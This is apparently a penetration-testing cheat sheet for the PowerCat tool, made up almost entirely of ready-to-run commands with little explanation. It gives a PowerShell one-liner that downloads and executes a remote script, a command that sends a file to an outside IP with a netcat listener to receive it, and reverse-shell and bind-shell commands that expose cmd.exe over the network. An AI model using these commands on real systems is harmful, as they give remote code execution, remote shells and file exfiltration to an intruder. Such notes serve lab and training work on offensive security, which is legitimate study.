PowerCat
Download:
iex (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1')
file transfer
Send:
# send
powercat -c 10.11.0.4 -p 443 -i C:\Users\Offsec\powercat.ps1
# recieve
sudo nc -lnvp 443 > receiving_powercat.ps1
Rev shell
# victim
powercat -c 10.11.0.4 -p 443 -e cmd.exe
# client
sudo nc -lvp 443
bind shell
# Listen
powercat -l -p 443 -e cmd.exe
# execute
nc 10.11.0.22 443
Last updated